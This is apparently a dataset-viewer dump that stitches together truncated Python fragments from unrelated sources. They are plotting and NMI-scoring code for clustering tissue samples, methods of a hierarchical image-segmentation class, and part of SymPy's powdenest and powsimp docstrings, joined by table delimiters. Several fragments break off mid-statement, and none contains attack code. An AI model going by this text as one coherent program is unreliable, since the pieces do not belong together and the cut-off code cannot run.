input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
import os
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import sys
import seaborn as sns
sns.set()
sns.set_context("paper")
from sklearn import metrics
# get colors from https://medialab.github.io/iwanthue/ or alternatively from http://phrogz.net/css/distinct-colors.html
# 50 visually distinct hex colours used as a categorical palette for the
# stacked bar plots; consumed one at a time (with wrap-around) by
# get_color_cycle().
colors_cycle = ["#a257d4",
"#e090bf",
"#64c9a3",
"#4b68ae",
"#dc8c2f",
"#cd41a7",
"#d9344f",
"#bc599a",
"#afa1e8",
"#48c1d8",
"#b54545",
"#919233",
"#9a78be",
"#59602a",
"#4e8e2c",
"#9db935",
"#9b563c",
"#e482df",
"#5995d3",
"#6a5198",
"#b05f84",
"#b563c3",
"#5f6b18",
"#a55c21",
"#5754c2",
"#277257",
"#4f9b5e",
"#8b6b29",
"#b8381c",
"#ad2f62",
"#97ba6d",
"#45c37c",
"#5fc250",
"#8c4c7b",
"#e06e87",
"#e2672a",
"#db7756",
"#974858",
"#35743b",
"#bbaf6c",
"#8c4099",
"#e44586",
"#ed5c4c",
"#389c84",
"#cfae3d",
"#eda377",
"#778749",
"#c5935a",
"#de8784",
"#757eec"]
def plot_cluster_composition(fraction_sites, directory, level, normalise=False, label='primary_site', shuffled=False,
                             algorithm='topsbm'):
    """Stacked-bar plot of how *label* values distribute across clusters.

    The cluster CSV written by *algorithm* at *level* is read only to
    determine the number of clusters; the bar heights come from
    *fraction_sites* (site -> per-cluster values). The figure is shown
    and saved as a PDF under directory/algorithm/.
    """
    sns.set(font_scale=0.8)
    clusters_df = pd.read_csv("%s/%s/%s_level_%d_clusters.csv" % (directory, algorithm, algorithm, level), header=[0])
    positions = np.arange(1, 1 + len(clusters_df.columns))
    fig = plt.figure(figsize=(15, 8))
    ax = fig.subplots()
    fraction_bar_plot(positions, fraction_sites, ax)
    ax.set_xlabel("cluster", fontsize=20)
    # y axis reads as a fraction or a raw count depending on normalise
    ylabel, ylabel_size = ("fraction of nodes", 22) if normalise else ("number of nodes", 20)
    ax.set_ylabel(ylabel, fontsize=ylabel_size)
    ax.set_title("%s%s distribution across clusters" % ("Shuffled " if shuffled else '', label), fontsize=20)
    ax.legend(ncol=3, loc='upper right')
    ax.tick_params(axis='both', labelsize=20)
    plt.show()
    fig.savefig("%s/%s/%s%sclustercomposition_l%d_%s.pdf" % (
        directory, algorithm, "shuffled" if shuffled else '', "fraction_" if normalise else '', int(level), label))
def fraction_bar_plot(x, fraction_sites, ax=None):
    """Draw a stacked bar chart of *fraction_sites* at positions *x*.

    Arguments:
      - x: bar positions (one per cluster)
      - fraction_sites: dict site -> per-cluster values; sites whose
        values are all zero are skipped
      - ax: target axes; a new figure/axes is created when None

    Side effect: resets the module-level colour cursor so every chart
    starts from the first palette entry.
    """
    global current_color
    current_color = -1
    if ax is None:
        fig = plt.figure(figsize=(15, 8))
        ax = fig.subplots()
    bottom = np.zeros(len(x))
    # removed unused local `ymax` (was assigned and never read)
    for site, data in fraction_sites.items():
        if np.max(data) == 0:
            # this label never appears in any cluster
            continue
        ax.bar(x, data, label=site, bottom=bottom, color=get_color_cycle())
        bottom = bottom + data
def get_Palette(site):
    """Return a matplotlib colormap name for a tissue *site*.

    The lookup is by substring: the first palette key contained in
    *site* wins. Returns None when no key matches.

    NOTE(review): 'YlRd' (Stomach) does not look like a standard
    matplotlib colormap name (cf. 'YlOrRd') -- confirm before using it.
    """
    palette_map = dict({'Brain': 'Blues',
                        'Breast': 'Reds',
                        'Kidney': 'Greens',
                        'Lung': 'Oranges',
                        'Thyroid': 'Greys',
                        'Uterus': 'Purples',
                        'Prostate': 'BuGn',
                        'Ovary': 'BuPu',
                        'Lymph Nodes': 'OrRd',
                        'Soft Tissue': 'PuRd',
                        'Esophagus': 'YlGn',
                        'Stomach': 'YlRd',
                        'Bone Marrow': 'PuBuGn',
                        'Skin': 'YlOrRd',
                        'Adipose Tissue': 'YlOrBr',
                        'Blood': 'RdPu',
                        'Pancreas': 'OrRd',
                        'Testis': 'GnBu'})
    for k in palette_map.keys():
        if k in site:
            return palette_map[k]
    # removed dead trailing `current_color = -1`: it assigned a local
    # (no `global` declaration) and had no effect
    return None
def get_color_cycle():
    """Advance the module-level colour cursor and return the next
    entry of *colors_cycle*, wrapping around at the end."""
    global current_color
    current_color = (current_color + 1) % len(colors_cycle)
    return colors_cycle[current_color]
def get_cluster_given_l(l, directory, algorithm='topsbm'):
    """Load the cluster assignments at hierarchy level *l*.

    Reads directory/algorithm/algorithm_level_l_clusters.csv (one column
    per cluster) and returns a dict mapping the cluster index to the
    array of its sample names (NaN padding dropped).
    """
    csv_path = "%s/%s/%s_level_%d_clusters.csv" % (directory, algorithm, algorithm, l)
    df_clusters = pd.read_csv(csv_path, header=[0], index_col=None)
    return {idx: df_clusters[col].dropna().values
            for idx, col in enumerate(df_clusters.columns)}
def get_topic_given_l(l, directory, algorithm='topsbm'):
    """Load the topic contents at hierarchy level *l*.

    Reads directory/algorithm/algorithm_level_l_topics.csv (one column
    per topic) and returns a dict mapping the topic index to the array
    of its members (NaN padding dropped).
    """
    csv_path = "%s/%s/%s_level_%d_topics.csv" % (directory, algorithm, algorithm, l)
    df_topics = pd.read_csv(csv_path, header=[0])
    return {idx: df_topics[col].dropna().values
            for idx, col in enumerate(df_topics.columns)}
def get_fraction_sites(cluster, df_files, label='primary_site', normalise=False):
    """Count, per cluster, how many samples carry each value of *label*.

    Arguments:
      - cluster: dict cluster-index -> iterable of sample names
      - df_files: metadata DataFrame indexed by (full) sample name
      - label: metadata column to count
      - normalise: divide counts by the cluster size

    Samples that cannot be matched in df_files are accumulated under an
    'unknown' pseudo-site. Returns a dict site -> per-cluster list,
    with sites ordered by decreasing average (computed over nonzero
    entries only).
    """
    fraction_sites = {}
    c_fraction_site = {}
    for site in df_files[label].dropna().unique():
        fraction_sites[site] = []
        c_fraction_site[site] = 0
    for i, c in enumerate(cluster):
        for sample in cluster[i]:
            foundsample = get_file(sample, df_files)
            if foundsample is not None:
                c_fraction_site[foundsample[label]] += 1
            else:
                if 'unknown' in c_fraction_site.keys():
                    c_fraction_site['unknown'] += 1
                else:
                    c_fraction_site['unknown'] = 1
                    # BUG FIX: pad the new list with zeros for the i
                    # clusters already processed; the original started it
                    # empty, leaving per-site lists of unequal length and
                    # making the DataFrame construction below raise.
                    fraction_sites['unknown'] = [0] * i
        for site in fraction_sites:
            if normalise:
                norm = float(len(cluster[i]))
            else:
                norm = 1
            if norm > 0:
                fraction_sites[site].append(c_fraction_site[site] / norm)
            else:
                fraction_sites[site].append(np.nan)
            c_fraction_site[site] = 0
    df = pd.DataFrame(data=fraction_sites).dropna(how='all', axis=0)
    # put first the columns with a high average over their nonzero entries
    avgs = df.apply(lambda x: np.average(x.to_numpy()[x.to_numpy().nonzero()[0]]), axis=0)
    df = df.transpose()
    df.insert(0, 'avg', avgs)
    df = df.sort_values(by=['avg'], axis=0, ascending=False).drop('avg', axis=1).transpose()
    df = df.sort_values(by=[tissue for tissue in df.columns], axis=0, ascending=False)
    return df.to_dict(orient='list')
def get_clustersinfo(cluster, fraction_sites):
    """Summarise the composition of every cluster.

    Arguments:
      - cluster: iterable of cluster keys (e.g. the dict returned by
        get_cluster_given_l)
      - fraction_sites: dict site -> per-cluster values (counts or
        fractions), indexable by cluster key

    Returns a dict of parallel per-cluster lists:
      - 'maximum': [share of the dominant site, its name]
      - 'homogeneity': 1 - Shannon entropy of the composition
      - 'sizes': sum of the per-site values
      - 'nclasses': number of sites present in the cluster
    """
    clustersinfo = {
        "maximum": [],
        "homogeneity": [],
        "sizes": [],
        "nclasses": []
    }
    for icluster in cluster:
        maximum = 0
        homo = 0
        size = 0
        nclass = 0
        site_maximum = ''
        cumulative = 0
        for site, data in fraction_sites.items():
            cdata = data[icluster]
            cumulative += cdata
            if cdata > maximum:
                maximum = cdata
                site_maximum = site
            if cdata > 0:
                nclass += 1
            # entropy term is meaningful only for normalised fractions;
            # the lower bound also guards against 0 * log(0) -> nan,
            # which previously poisoned the homogeneity score
            if 0 < cdata <= 1:
                homo -= cdata * np.log(cdata)
            size += cdata
        if cumulative > 0:
            clustersinfo['maximum'].append([float(maximum) / cumulative, site_maximum])
        else:
            clustersinfo['maximum'].append([0, site_maximum])
        clustersinfo['sizes'].append(size)
        clustersinfo['nclasses'].append(nclass)
        clustersinfo['homogeneity'].append(1 - homo)
    return clustersinfo
def plot_maximum(clustersinfo, cluster, label, level, directory, clustersinfo_shuffle=None, algorithm='topsbm'):
    """Plot per-cluster purity: sorted values (left) and their pdf (right).

    When *clustersinfo_shuffle* is given, the shuffled baseline is
    overlaid and the output filename gets a 'shuffled' prefix.
    """
    fig = plt.figure(figsize=(15, 6))
    ax = fig.subplots(1, 2)
    n_bins = 10
    hist_opts = dict(histtype='step', bins=n_bins, lw=4, density=True, range=(0.05, 1.05))
    purity = np.array(clustersinfo['maximum'])[:, 0].astype(float)
    ax[0].plot(np.sort(purity), marker='o', ms=25, ls='')
    ax[1].hist(np.sort(purity), **hist_opts)
    shuffled = clustersinfo_shuffle is not None
    if shuffled:
        purity_shuffle = np.array(clustersinfo_shuffle['maximum'])[:, 0].astype(float)
        ax[0].plot(np.sort(purity_shuffle), marker='o', ls='', ms=25)
        ax[1].hist(np.sort(purity_shuffle), **hist_opts)
    # 0.8 purity reference line across all clusters
    ax[0].plot(np.arange(len(cluster)), [0.8] * len(cluster), visible=True, ls='--')
    for axi in ax:
        axi.tick_params(axis='both', labelsize=20)
    ax[0].set_xlabel("cluster", fontsize=20)
    ax[0].set_ylabel("maximum fraction\nwith same %s" % label, fontsize=20)
    ax[0].set_ylim((0, 1.1))
    ax[1].set_xlabel("maximum fraction\nwith same %s" % label, fontsize=20)
    ax[1].set_ylabel("pdf", fontsize=20)
    plt.rc('xtick', labelsize=18)
    plt.rc('ytick', labelsize=18)
    plt.show()
    fig.savefig(
        "%s/%s/%scluster_maximum_l%d_%s.pdf" % (directory, algorithm, "shuffled" if shuffled else '', level, label))
def plot_maximum_size(clustersinfo, label, level, directory, clustersinfo_shuffle=None, algorithm='topsbm'):
    """Scatter of per-cluster purity vs cluster size, with a 1/size
    reference curve ('uniform'); optionally overlays the shuffled
    baseline and prefixes the output filename with 'shuffled'."""
    fig = plt.figure(figsize=(15, 6))
    sizes = np.array(clustersinfo['sizes']).astype(int)
    purity = np.array(clustersinfo['maximum'])[:, 0].astype(float)
    plt.scatter(sizes, purity, lw=10, label='clusters')
    plt.xlim(0, np.max(sizes) + np.max(sizes) / 10)
    ref = np.linspace(0.5, sizes.max())
    plt.plot(ref, 1. / ref, label='uniform')
    shuffled = clustersinfo_shuffle is not None
    if shuffled:
        sizes_shuffle = np.array(clustersinfo_shuffle['sizes']).astype(int)
        purity_shuffle = np.array(clustersinfo_shuffle['maximum'])[:, 0].astype(float)
        plt.scatter(sizes_shuffle, purity_shuffle, lw=10, label='clusters shuffled')
        plt.xlim(0, np.max(sizes_shuffle) + np.max(sizes_shuffle) / 10)
    plt.xlabel("cluster size", fontsize=20)
    plt.ylabel("maximum fraction\nwith same %s" % label, fontsize=20)
    plt.ylim((0, 1.1))
    plt.legend(loc='best', fontsize=20)
    plt.rc('xtick', labelsize=18)
    plt.rc('ytick', labelsize=18)
    plt.show()
    fig.savefig(
        "%s/%s/%sclusterhomosize_l%d_%s.pdf" % (directory, algorithm, "shuffled" if shuffled else '', level, label))
def plot_maximum_label(clustersinfo, label, level, directory, clustersinfo_shuffle=None, algorithm='topsbm'):
    """Scatter of per-cluster purity vs number of distinct labels, with
    a 1/n reference curve ('uniform'); optionally overlays the shuffled
    baseline and prefixes the output filename with 'shuffled'."""
    fig = plt.figure(figsize=(10, 6))
    nclasses = np.array(clustersinfo['nclasses']).astype(int)
    purity = np.array(clustersinfo['maximum'])[:, 0].astype(float)
    shuffled = clustersinfo_shuffle is not None
    plt.scatter(nclasses, purity, lw=10, alpha=0.9, label='clusters')
    ref = np.arange(1, np.max(nclasses) + 2)
    plt.plot(ref, 1. / ref, ls='--', c='cyan', label='uniform')
    plt.xlim(0.95, np.max(nclasses) + 0.5)
    if shuffled:
        nclasses_shuffle = np.array(clustersinfo_shuffle['nclasses']).astype(int)
        purity_shuffle = np.array(clustersinfo_shuffle['maximum'])[:, 0].astype(float)
        plt.scatter(nclasses_shuffle, purity_shuffle, lw=10, alpha=0.9, label='clusters shuffled')
        ref_shuffle = np.arange(1, np.max(nclasses_shuffle) + 2)
        plt.plot(ref_shuffle, 1. / ref_shuffle, ls='--', c='cyan', label='')
        plt.xlim(0.95, np.max(nclasses_shuffle) + 0.5)
    plt.xlabel("number of labels", fontsize=20)
    plt.ylabel("maximum fraction\nwith same %s" % label, fontsize=20)
    plt.ylim((0, 1.1))
    plt.rc('xtick', labelsize=16)
    plt.rc('ytick', labelsize=16)
    plt.legend(loc='lower right', fontsize=20)
    plt.show()
    fig.savefig(
        "%s/%s/%scluster_homon_l%d_%s.pdf" % (directory, algorithm, "shuffled" if shuffled else '', level, label))
def plot_labels_size(clustersinfo, label, level, directory, clustersinfo_shuffle=None, algorithm='topsbm'):
    """Scatter of number of distinct labels vs cluster size; optionally
    overlays the shuffled baseline (widening the axes to fit it) and
    prefixes the output filename with 'shuffled'."""
    fig = plt.figure(figsize=(10, 6))
    sizes = np.array(clustersinfo['sizes']).astype(float)
    nclasses = np.array(clustersinfo['nclasses']).astype(int)
    plt.xlim(sizes.min() - 10, sizes.max() + 5)
    plt.ylim(nclasses.min() - 2, nclasses.max() + 5)
    shuffled = clustersinfo_shuffle is not None
    plt.scatter(sizes, nclasses, lw=10, alpha=0.9, label='clusters')
    if shuffled:
        sizes_shuffle = np.array(clustersinfo_shuffle['sizes']).astype(float)
        nclasses_shuffle = np.array(clustersinfo_shuffle['nclasses']).astype(int)
        plt.scatter(sizes_shuffle, nclasses_shuffle, lw=10, alpha=0.9, label='clusters shuffled')
        plt.xlim(sizes.min() - 10, sizes_shuffle.max() + 5)
        plt.ylim(nclasses.min() - 2, nclasses_shuffle.max() + 8)
    plt.xlabel("cluster size", fontsize=20)
    plt.ylabel("number of labels", fontsize=20)
    plt.legend(loc='upper right', fontsize=20)
    plt.rc('xtick', labelsize=16)
    plt.rc('ytick', labelsize=16)
    plt.show()
    fig.savefig(
        "%s/%s/%scluster_shuffle_label_size_l%d_%s.pdf" % (
            directory, algorithm, "shuffled" if shuffled else '', level, label))
def make_heatmap(fraction_sites, directory, label, level, shuffled=False, normalise=False, algorithm='topsbm'):
    """Heatmap of *fraction_sites* (sites on rows, clusters on columns),
    saved as a PDF under directory/algorithm/. Sites whose values are
    all zero are dropped from the plot."""
    sns.set(font_scale=2)
    # keep only sites that actually appear somewhere
    found_classes = [site for site, data in fraction_sites.items() if np.max(data) != 0]
    # number of clusters = length of any per-site list
    for arr in fraction_sites.values():
        n_clusters = len(arr)
        break
    x = np.arange(1, 1 + n_clusters)
    fig = plt.figure(figsize=(30, 10))
    fig.subplots(1)
    heat_df = pd.DataFrame(data=fraction_sites).loc[:, found_classes].transpose()
    sns.heatmap(heat_df, vmin=0, cmap="RdYlBu_r",
                xticklabels=x)
    fig.savefig("%s/%s/%sheatmap_cluster%s_l%d_%s.pdf" % (
        directory, algorithm, "shuffled" if shuffled else '', "fraction_" if normalise else '', int(level), label))
def get_file(sample, df_file):
    """Return the metadata row whose index contains *sample* as a
    substring, or None when no index entry matches."""
    match = next((full_name for full_name in df_file.index.values if sample in full_name), None)
    if match is None:
        return None
    return df_file.loc[match, :]
def define_labels(cluster, df_files, label='primary_site', verbose=False):
    """Build aligned true/predicted label lists for clustering metrics.

    Arguments:
      - cluster: dict cluster-key -> iterable of sample names
      - df_files: metadata DataFrame indexed by full sample name
      - label: metadata column to use as the true label
      - verbose: print each cluster key while processing

    Returns (true_labels, predicted_labels) where true labels are
    encoded as integer codes via np.unique and predictions are the
    cluster keys. Unresolvable samples are kept as '' in both lists so
    the two stay aligned.
    """
    true_labels = []
    predicted_labels = []
    for c in cluster:
        if verbose:
            print(c)
        for sample in cluster[c]:
            try:
                true_labels.append(get_file(sample, df_files)[label])
                predicted_labels.append(c)
            except Exception:
                # narrowed from a bare `except:` (which also swallowed
                # KeyboardInterrupt/SystemExit); keep the lists aligned
                # even when the sample cannot be resolved
                true_labels.append('')
                predicted_labels.append('')
                print(*sys.exc_info())
                print("error searching %s in %s" % (label, sample))
    # encode the string labels as integer codes
    _, true_labels = np.unique(true_labels, return_inverse=True)
    return true_labels, predicted_labels
def add_score_lines(ax, scores, labels=None, h=False, c=False, alpha=0.8, **kwargs):
    '''
    Add to *ax* one NMI line per entry of *labels* found in *scores*.

    Arguments:
      - ax: matplotlib axes
      - scores: dict label -> {'xl': x values, 'V': NMI values, and
        optionally 'h' (homogeneity) and 'c' (completeness)}
      - labels: labels to plot; unknown labels are reported and skipped
      - h, c: also plot the homogeneity / completeness curves
      - alpha: transparency for the h/c curves
      - kwargs: forwarded to ax.plot for the main 'V' curve

    Raises ValueError when a label's 'V' series length does not match
    its 'xl'.
    '''
    # per-label colours; labels not listed here fall back to 'darkblue'
    colors = {
        'primary_site': 'blue',
        'hsbm': 'blue',
        'secondary_site': 'red',
        'status': 'red',
        'hSBM': 'blue',
        'mixed': 'green',
        'hierhsbm': 'purple',
        'hsbm->hierachical': 'purple',
        'disease_type': 'red',
        'shuffle': 'orange',
        'tm': 'darkcyan',
        'cc': 'darkred',
        'disease_tissue': 'purple',
        'hierarchical': 'darkgreen',
        'lda': 'violet',
        'RPPA Clusters': 'red',
        'wgcna': 'purple'
    }
    for label in labels:
        if label not in scores.keys():
            print("No score for %s" % label)
            continue
        if label not in colors.keys():
            colors[label] = 'darkblue'
        xl = scores[label]['xl']
        if h:
            ax.plot(xl, scores[label]['h'], ls='-.', c=colors[label], marker='x', lw=0.5, ms=25, alpha=alpha,
                    label='homogeneity - %s' % label)
        if c:
            # NOTE: legend text 'completness' kept as-is for continuity
            ax.plot(xl, scores[label]['c'], ls=':', c=colors[label], marker='<', lw=0.5, ms=25, alpha=alpha,
                    label='completness - %s' % label)
        if len(scores[label]['V']) == len(xl):
            ax.plot(xl, scores[label]['V'], label='%s' % label, ls='-', c=colors[label], marker='o', lw=0.5, ms=25,
                    **kwargs)
        else:
            # fixed: was `raise(ValueError("xl has got wrong lenght"))`
            raise ValueError("xl has got wrong length")
    customize_metric_plot(ax, xl)
def customize_metric_plot(ax, xl):
    """Apply the shared axis cosmetics for the NMI-vs-clusters plots:
    labels, y range, log x scale sized to *xl*, and legend."""
    ax.set_xlabel("Number of clusters", fontsize=22)
    ax.set_ylabel("NMI score", fontsize=22)
    ax.set_ylim((0, 1.1))
    ax.set_xlim(1, np.max(xl)*1.1)
    ax.set_xscale('log')
    ax.legend(loc='best', fontsize=24)
def plot_topic_size(directory, l, algorithm='topsbm'):
df_topics = pd.read_csv("%s/%s/%s_level_%d_topics.csv" % (directory, algorithm, algorithm, l))
sizes = []
for t in df_topics.columns:
sizes.append(len(df_topics.loc[:, t].dropna()))
bins = np.linspace(0.5, np.max(sizes) + 0.5, int((np.max(sizes) + 1) / (np.max(sizes) / 5)))
bin_counts, bin_edges, _ = plt.hist(sizes, histtype='step', lw=2, bins=bins)
fig = | |
if level is None:
# all levels
result = [self.getNNew(level=t_level) for t_level
in range(self.topLevel+1)]
return result
else:
# level specified
return len(self.findNewIds(level=level))
def findIds(self, func, kargs):
    """
    Return ids for which function ``func``, called with the keyword
    arguments in ``kargs``, returns True.

    NOTE(review): marked "in progress" -- ``func`` is currently invoked
    with the same ``kargs`` for every id (the id itself is not passed),
    so the result is either all ids or none. Confirm intended semantics
    before relying on this.

    Arguments:
      - func: predicate, called as func(**kargs)
      - kargs: dictionary containing func arguments

    Returns: list of ids
    """
    # in progress
    return [id_ for id_ in self.ids if func(**kargs)]
def findIdsByVolume(self, min=None, max=None, volume=None):
    """
    Return ids of segments whose volume is between min (inclusive) and
    max (exclusive).

    If min (max) argument is not specified, that limit is not imposed.
    If arg volume is given, segment volumes are not calculated here.

    Arguments:
      - min: minimum volume (inclusive)
      - max: maximum volume (exclusive)
      - volume: array of volumes indexed by ids

    Returns: list of segment ids
    """
    # get volume of all segments unless precomputed volumes were passed
    # (bug fix: the original ignored the volume argument and then hit a
    # NameError on the undefined local `vol` whenever it was supplied)
    if volume is None:
        vol = self.getVolume()
    else:
        vol = volume
    # impose limits
    ids = self.ids
    if min is not None:
        ids = [id_ for id_ in ids if vol[id_] >= min]
    if max is not None:
        ids = [id_ for id_ in ids if vol[id_] < max]
    return ids
def findIdsBySVRatio(self, min=None, max=None, volume=None,
                     surface=None, thick=1):
    """
    Return ids of segments whose surface-to-volume ratio is between
    min (inclusive) and max (exclusive).

    Arguments:
      - min: minimum surface to volume ratio (inclusive)
      - max: maximum surface to volume ratio (exclusive)
      - volume: array of volumes indexed by ids (computed when None)
      - surface: array of surfaces indexed by ids (computed when None)
      - thick: thickness of surfaces (used only when surface is None)

    Returns: list of segment ids
    """
    # use precomputed arrays when given (bug fix: the original ignored
    # both arguments, leaving `vol` undefined when volume was supplied,
    # and called self.getSurface(size=size) with an undefined name --
    # getSurface takes `thick`)
    if volume is None:
        vol = self.getVolume()
    else:
        vol = volume
    if surface is None:
        sur = self.getSurface(thick=thick)
    else:
        sur = surface
    sv_ratio = sur / vol
    # impose limits
    ids = self.ids
    if min is not None:
        ids = [id_ for id_ in ids if sv_ratio[id_] >= min]
    if max is not None:
        ids = [id_ for id_ in ids if sv_ratio[id_] < max]
    return ids
def getVolume(self, ids=None):
    """
    Finds volume of segments whose ids are specified, or of all segments
    if ids is None.

    Arguments:
      - ids: list of ids

    Returns:
      - if ids is None: ndarray of volumes indexed by ids (0-th element is 0)
      - if ids are given: list of volumes corresponding to ids
    """
    # get volumes of segment extensions over lower levels
    from .morphology import Morphology
    mor = Morphology(segments=self.data, ids=self.ids)
    vol = mor.getVolume()
    # for each segment add the volumes of all segments directly below it;
    # levels are walked bottom-up, so each lower sum is already complete
    # when it is folded into the level above
    for level in range(1, self.topLevel+1):
        for id_ in self.getIds(level):
            for l_id in self.getLowerIds(id_):
                vol[id_] += vol[l_id]
    # return
    if ids is None:
        vol[0] = 0  # position 0 is not a valid id
        return vol
    else:
        return vol[ids]
def getSurface(self, ids=None, thick=1):
    """
    Finds surface of segments whose ids are specified, or of all segments
    if ids is None.

    Uses Morphology.getSurface to obtain and calculate surfaces.

    Arguments:
      - ids: list of ids
      - thick: thickness of surface

    Returns:
      - if ids is None: ndarray of surfaces indexed by ids (0-th element is 0)
      - if ids are given: list of surfaces corresponding to ids
    """
    # find levels to which ids belong; with no ids, cover every level
    if ids is None:
        levels = list(range(self.topLevel+1))
    else:
        levels = set(self.getIdLevels(ids))
    # get surfaces level by level and merge the results into one object
    from .morphology import Morphology
    mor = Morphology()
    for level in levels:
        level_seg = self.extractLevel(level=level, new=True)
        curr_mor = Morphology(level_seg)
        curr_mor.getSurface(size=thick, copy=False)
        mor.merge(curr_mor)
    sur = mor.surface
    sur[0] = 0  # position 0 is not a valid id
    if ids is None:
        return sur
    else:
        return sur[ids]
def findIdsByNBound(self, min=None, max=None, contacts=None):
    """
    Return ids of segments that contact at least min and at most max
    boundaries (both limits inclusive; a missing limit is not imposed).

    Arguments:
      - min/max: min/max number of contacted boundaries
      - contacts: (Contacts) contacts between segments and boundaries;
        self.contacts is used when None

    Returns: (list) segment ids
    """
    # boundary counts for every segment
    n_bound = self.getNBound(contacts=contacts)
    # filter by the requested limits
    result = self.ids
    if min is not None:
        result = [seg_id for seg_id in result if n_bound[seg_id] >= min]
    if max is not None:
        result = [seg_id for seg_id in result if n_bound[seg_id] <= max]
    return result
def getNBound(self, ids=None, contacts=None):
"""
Finds number of contacted boundaries.
Argument:
- ids: (list, ndarray, or single int) segment id(s)
- contacts: (Contacts) contacts between segments and boundaries, if
None self.contacts is used
Returns (int) number of boundary ids if arg ids is a sigle int, or a
list if it is a list (or ndarray)
"""
# set contacts
if contacts is None:
contacts = self.contacts
# get n bound
if ids is None:
n_bound = numpy.zeros(shape=self.maxId+1, dtype='int')
for id_ in self.ids:
n_bound[id_] = self.getBoundIds(id_, contacts=contacts).size
return n_bound
elif isinstance(ids, list) or isinstance(ids, numpy.ndarray):
return [self.getNBound(id_, contacts=contacts) for id_ in ids]
else:
return self.getBoundIds(ids, contacts=contacts).size
def getBoundIds(self, ids, contacts=None):
"""
Return boundary ids that contact each of the specified segment ids.
Argument:
- ids: (list, ndarray, or single int) segment id(s)
- contacts: (Contacts) contacts between segments and boundaries, if
None self.contacts is used
Returns ndarray of boundary ids if ids is a sigle int, or a list of
ndarrays if it is a list (or ndarray)
"""
if isinstance(ids, list) or isinstance(ids, numpy.ndarray):
return [self.getBoundIds(id_, contacts=contacts) for id_ in ids]
else:
id_ = ids
if contacts is None:
contacts = self.contacts
b_ids = contacts.findBoundaries(segmentIds=id_, nSegment=1,
mode='at_least', update=False)
return b_ids
def getDensity(self, image, ids=None):
    """
    Calculates density-related statistics (mean, std, min, max).

    Only the values for segments whose ids are specified are calculated,
    but the returned object still has (wrong) values for other ids. If
    ids is None, density for all ids is calculated.

    Arguments:
      - image: ndarray or Grey (Image) object containing a (grayscale) image
      - ids: list of segment ids

    Returns Statistics object with the following attributes:
      - mean
      - std
      - min
      - max

    Each of these is an array indexed by ids (e.g. mean[3] is the mean
    value of segment 3). Elements at position 0 are set to 0. If there
    are no ids, all the above attributes are None.
    """
    # figure out image: accept either a Grey wrapper or a bare ndarray
    if isinstance(image, Grey):
        image = image.data
    # find levels to which ids belong; with no ids, cover every level
    if ids is None:
        levels = list(range(self.topLevel+1))
    else:
        levels = set(self.getIdLevels(ids))
    # get density stats of segment extensions over all levels
    # NOTE(review): calculate() is invoked once per level on the same
    # Statistics object -- presumably it accumulates/merges per-id
    # results rather than overwriting them; confirm in Statistics.
    dens = Statistics()
    for level in levels:
        level_seg = self.extractLevel(level=level, new=True)
        dens.calculate(data=image, labels=level_seg.data, ids=level_seg.ids)
    # set elements at position 0 to 0 (position 0 is not a valid id);
    # TypeError means the attributes are None (no ids) -- leave as is
    try:
        dens.mean[0] = 0
        dens.std[0] = 0
        dens.min[0] = 0
        dens.max[0] = 0
    except TypeError:
        pass
    return dens
##################################################################
#
# Conversion
#
#################################################################
def toSegment(self, copy=False):
    """
    Makes Segment object from this instance. Makes sense only if this
    instance is flat (no segment is above or below any other segment).

    Sets data, ids, structEl and positional attributes. Data is copied
    if argument copy is True. All other attributes are always copied.

    Also extracts values of all (level defined) properties corresponding
    to this instance and saves them as attributes of the newly created
    Segment. These attributes are ndarrays indexed by ids (of the Segment
    object).

    Argument:
      - copy: if True a copy of self.data is made

    Returns Segment object.
    """
    # set data and ids
    from .segment import Segment
    seg = Segment(data=self.data, ids=self.ids, copy=copy)
    # set positioning
    seg.copyPositioning(self)
    # set thresholds
    #seg.thresh = self.thresh
    # set properties (indexed by ids)
    props = self.extractProperties(ids=seg.ids)
    seg.setProperties(props)
    # set structEl
    if self.structEl is not None:
        seg.structEl = deepcopy(self.structEl)
    # set contact and count se connectivities
    # NOTE(review): these assignments copy FROM the new Segment TO self,
    # which looks backwards for a conversion method -- confirm whether
    # `seg.contactStructElConn = self.contactStructElConn` was intended.
    self.contactStructElConn = seg.contactStructElConn
    self.countStructElConn = seg.countStructElConn
    return seg
##################################################################
#
# Dendogram related
#
#################################################################
def dendogram(
self, mode='center', nodes=None, nodesize=2, ids=False,
line_color='black', line_width=1.0, new_plot=True):
"""
Plots dendogram of this hierarchy.
Note: works only if package matplotlib.pyplot can be imported.
ToDo:
- show/label only new nodes
- perhaps put the threshold part in ThreshConn
- put constants to arguments
- optimize v_lines
Arguments:
- mode: determines how an id (node) is positioned in respect | |
>>> i, j = symbols('i,j', integer=True)
>>> powdenest((x**x)**(i + j)) # -X-> (x**x)**i*(x**x)**j
x**(x*(i + j))
But exp() will be denested by moving all non-log terms outside of
the function; this may result in the collapsing of the exp to a power
with a different base:
>>> powdenest(exp(3*y*log(x)))
x**(3*y)
>>> powdenest(exp(y*(log(a) + log(b))))
(a*b)**y
>>> powdenest(exp(3*(log(a) + log(b))))
a**3*b**3
If assumptions allow, symbols can also be moved to the outermost exponent:
>>> i = Symbol('i', integer=True)
>>> p = Symbol('p', positive=True)
>>> powdenest(((x**(2*i))**(3*y))**x)
((x**(2*i))**(3*y))**x
>>> powdenest(((x**(2*i))**(3*y))**x, force=True)
x**(6*i*x*y)
>>> powdenest(((p**(2*a))**(3*y))**x)
p**(6*a*x*y)
>>> powdenest(((x**(2*a/3))**(3*y/i))**x)
((x**(2*a/3))**(3*y/i))**x
>>> powdenest((x**(2*i)*y**(4*i))**z, force=True)
(x*y**2)**(2*i*z)
>>> n = Symbol('n', negative=True)
>>> powdenest((x**i)**y, force=True)
x**(i*y)
>>> powdenest((n**i)**x, force=True)
(n**i)**x
"""
if force:
eq, rep = posify(eq)
return powdenest(eq, force=False).xreplace(rep)
if polar:
eq, rep = polarify(eq)
return unpolarify(powdenest(unpolarify(eq, exponents_only=True)), rep)
new = powsimp(sympify(eq))
return new.xreplace(Transform(
_denest_pow, filter=lambda m: m.is_Pow or m.func is exp))
# module-level sentinel symbol used by powsimp below to funnel a bare Pow
# through the Mul-handling path (multiplied in, then divided back out)
_y = Dummy('y')
def powsimp(expr, deep=False, combine='all', force=False, measure=count_ops):
"""
reduces expression by combining powers with similar bases and exponents.
Notes
=====
If deep is True then powsimp() will also simplify arguments of
functions. By default deep is set to False.
If force is True then bases will be combined without checking for
assumptions, e.g. sqrt(x)*sqrt(y) -> sqrt(x*y) which is not true
if x and y are both negative.
You can make powsimp() only combine bases or only combine exponents by
